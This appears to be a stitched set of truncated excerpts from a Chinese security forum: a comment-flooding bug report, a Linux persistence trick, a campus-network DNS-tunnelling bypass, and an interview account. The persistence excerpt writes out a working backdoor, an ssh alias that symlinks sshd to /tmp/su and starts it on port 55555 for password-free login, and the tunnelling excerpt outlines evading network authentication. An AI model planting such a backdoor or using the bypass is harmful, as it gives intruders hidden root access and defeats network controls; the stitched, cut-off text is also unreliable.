1.1社区存在评论灌水1.1.1漏洞地址https://bbs.zkaq.cn/t/*.html1.1.2漏洞分析抓重复放包可以重复回复第一个人，同时这个pid也可以修改，对其他用户进行回复1.1.3风险分析造成其他用户的体验感下降1.1.4风险等级未知1.1.5安全建议回复部分添加验证码

今天讲的是linux权限控制的手法，总结了下大概有以下这些：最近也在总结这些方法，就想着是否可以将其中的控制手法组合起来形成一个新的手法呢？说干就干alias + 软链接：alias ssh='rm -rf /tmp/su;ln -fs /usr/sbin/sshd /tmp/su;/tmp/su -oport=55555;ssh'我们写到环境变量中，有六种环境变

前言：校园网肯定都用过，但是你是否想过，是否可以破解校园网，从而让我们免费上网呢？我们思考一件事情，为什么我们没有登录会自动条状到验证界面的呢？我们可以解析其网址呢？这就是因为校园网没有阻断53端口准备：一台公网服务器、DNS穿透工具iodined、代理软件ew、windwos代理工具proxfier、tap虚拟网卡操作：1、验证连接到校园网主机没有登录，是否能够进行DNS解析nslooku

第一次面试：面试中要求会网络先关的知识第二次面试：一面的时候因为没有提前准备，很紧张，意想不到的是给我二面的机会。还好我在二面过后好好总结了下面试的话提前准备开场白：你好面试官，我叫胡嘉伟，大三在读学生。本人刻苦勤奋，工作踏实，善于学习。鉴于当前的国际形势，网络安全就是国家安全。我在学习好本专业软件工程的同时，涉足了渗透测试工程师的培训，通过三个月的web渗透学习，已经具备了基本的渗透测试能